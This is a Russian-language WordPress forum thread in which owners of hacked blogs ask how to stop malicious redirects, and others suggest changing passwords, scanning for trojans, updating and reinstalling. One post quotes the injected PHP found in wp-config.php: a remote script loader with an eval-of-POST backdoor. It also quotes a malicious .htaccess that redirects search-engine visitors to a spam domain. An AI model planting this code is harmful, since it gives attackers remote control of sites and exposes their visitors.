Взломали и поставили редирект
-
В общем, беда случилась у меня. Где-то с неделю назад захожу на один из своих блогов, а там вместо главной редиректит меня на http://85.25.95.20/. У меня сразу паника, обращаюсь в тех поддержку, говорят что был изменен index.php, заменил его на стандартный, проблема ушла. Через день тоже самое… Опять поставил стандартный и поставил права 444 (вместо 644), 2-3 дня проблемы не было. Сегодня буквально час назад захожу, а сея беда на всех сайтах. А на основном блоге все файлы (кроме папок) снесли, на остальных оставили. Но на всех изменили файл index.php. Что делать? Посоветуйте пожалуйста!
-
Для начала надо найти больное место: троян на Вашем компе, уязвимый плагин, Тема с закладкой, проблемы у хостера и т.д.
Дальнейшие действия зависят от уязвимости. В общем случае: поменять все пароли, удалить все скрипты на сервере и залить заведомо чистые, обзавестись каким-нибудь «инструментом слежения» (парочка описана у меня в блоге).Юрий, а можно поподробнее? Что за скрипты? Как вообще все это дело проверить?
Вот что хостер предлагает:
Мы можем провести диагностику Вашего сервера,а так же просканировать на наличие Rootkitов,стоимость данной услуги составляет 25$.
Поменял пароль в ISPmanager, FTP, пароль от MySQL. Помогите с решением, в долгу не останусь. Если можно, напишите мне в ICQ 428-068-888
а можно поподробнее?
Подробнее потянет на приличную монографию.
стоимость данной услуги составляет 25$.
Демпингуют 🙂 Нормальный аудит безопасности стоит на один-два порядка больше.
Если у Вас на рабочем компе стоит винда, то для начала проверьте её двумя-тремя антивирусами, лучше «автономными» Live-CD. Если троян в машине, то новый пароль будет известен злоумышленнику сразу же, как только поменяете.
Нет у меня живой аськи.
Да, а как понимать фразу «Вашего сервера»? У Вас выделенный сервер?
Слова хостера:
Данная проблема, возникает из за имеющихся уязвимостей в Ваших скриптах.
Вы можете заказать проверку скриптов на наличие уязвимостей у WEB разработчиков.
Мы как хостинг провайдер,предоставляем Вам площадку для размещения проектов и не можем нести ответственность за корректность работы Ваших скриптов.
Да, VPS у меня. Виртуальный хостинг все мои сайты уже не тянул. Так они мне говорили.
Юрий, а где мы можем с вами поговорить?
Хочу услышать ответ на такой вопрос: Если на компе нет вируса и если я поменял пароль от ФТП и от ISPmanager — возможно ли такое что прекратится такого рода атака?
Заранее спасибо за ответ.
За VPS я даже браться не буду.
Поговорить можем в email: bela(at)portal.kharkov.ua
Если на компе нет вируса и если я поменял пароль от ФТП и от ISPmanager — возможно ли такое что прекратится такого рода атака?
Может, если: 1.для взлома использовался ftp и 2.враги не оставили на сайте «закладку».
Я смотрю, у Вас на «профильном» сайте стоит WP 3.1.1, а последний в линейке — 3.1.4. Стоит обновиться.
Почитал ветку и хочу продолжить и рассказать свой случай: Оба моих ВордПрессовских сайта легли.. Набираю название сайта а там редирект на ….ru/. Причем такой редирект проявлял себя только в Мозиле, в Опере и ИЕ — все открывалось. Мне это не понравилось и я начал рыть. После недельных усилий выяснил:
1) какой-то скрипт прописывает следующий код в wp-config.php (в первой строке после стандартной <?p…?>:<?php global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
2) в корне создается файл indexs.php и wp-config.php.htm — насколько я понял это вообще «левые» файлы которых быть не должно..
После долгих усилий мое решение было следующее — пришлось сносить ВСЕ проекты на хостинге под моим акком. Залил оригинальные инсталяшки и установил все проекты заново!
Во общем пришлось повозиться..Просмотрел логи но так и не смог понять в чем был причина (может кто-то пояснит?). Чтобы подобного не случилось вновь я разрешил доступ по фтп только со своего IP. Но как защититься от взлома через html ? И можно ли еще что-то предпринять для защиты ??
буду признателен за советы!!!…забыл добавить! Эта зараза постоянно создавала свой .htaccess в котором присутствовал код :
<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing)\.(.*) RewriteRule ^(.*)$ http://brendarco.ru/original/index.php [R=301,L] RewriteCond %{HTTP_REFERER} ^.*(dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|metabot|dmoz|euroseek|about|icq)\.(.*) RewriteRule ^(.*)$ http://brendarco.ru/original/index.php [R=301,L] </IfModule>
т.е. редирект был на всякие там http://brendarco.ru и т.д.. Убивать все эти .htaccess не удавалось. Они создавались вновь!!
Кстати! вопрос к спецам — как тот же .htaccess или другие файлы могут быть модифицированны при установленных правах 644 ?? — запрет на запись..
А теперь просто в index.php iframe код вставляют…
ну так index.php ведь тоже защещен от записи!!! как ?
Кстати! вопрос к спецам — как тот же .htaccess или другие файлы могут быть модифицированны при установленных правах 644 ?? — запрет на запись..
Зависит от того, с чьими правами хозяйничает взломщик. Во-первых, на половине хостингов Апач выполняется от имени владельца сайта (это те, где не надо ставить 777 на uploads, где ,htaccess создается движком). Во-вторых, половина (если не больше) взломов осуществляется через ftp по ворованным паролям владельца сайта. В-третьих, в связи с массовым появлением говнохостеров и столь же массовым выпихиванием юзеров на VPS/VDS без объяснения, что без нормального сисадмина сервер превращается в одну большую дыру, всё чаще встречаются взломы самой системы, а для рута юзерские права не помеха.
- Тема «Взломали и поставили редирект» закрыта для новых ответов.